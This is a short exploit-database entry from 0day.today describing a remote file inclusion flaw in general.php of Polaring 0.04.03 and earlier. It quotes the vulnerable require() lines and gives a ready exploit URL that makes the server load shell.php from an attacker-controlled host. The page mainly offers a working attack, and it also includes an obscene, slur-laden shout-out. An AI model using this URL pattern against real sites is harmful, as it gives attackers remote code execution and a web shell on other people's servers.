[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Polaring <= 0.04.03 (general.php) Remote File Include Vulnerability

Author
Drago84
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-884
Category
web applications
Date add
25-09-2006
Platform
unsorted
===================================================================
Polaring <= 0.04.03 (general.php) Remote File Include Vulnerability
===================================================================



###### ToXiC #########################
# 
#Polaring  Remote File Include
#
#BuG FounD  by Drago84
#
#Application Affect: Polaring  Remote File Include
#Source Code:
#http://sourceforge.net/project/showfiles.php?group_id=150989&package_id=166837&release_id=444225
#Problem:
#require($_SESSION['dirMain'].'/view/css.php');
#require($_SESSION['dirMain'].'/view/frontpage.php');
#require($_SESSION['dirMain'].'/view/navigation.php');
#require($_SESSION['dirMain'].'/view/gmaps.php');
#require($_SESSION['dirMain'].'/view/errorReport.php');
#Solution : Declare $_SESSION['dirMain']
#Page Vulnerable : general.php
#Dir             : /view/
# Exempe Of ExPloit is:
#http://www.site.com/polaring_dir/view/general.php?_SESSION['dirMain']=http://marcusbestlamer.gay/shell.php?

#GrEatZ All Member of ToXiC, Str0ke
# Fuck Sonic Il chan italiano + merdoso che esista
# ToXic Security Italian CreW

######
ToXiC
###################



#  0day.today [2024-12-25]  #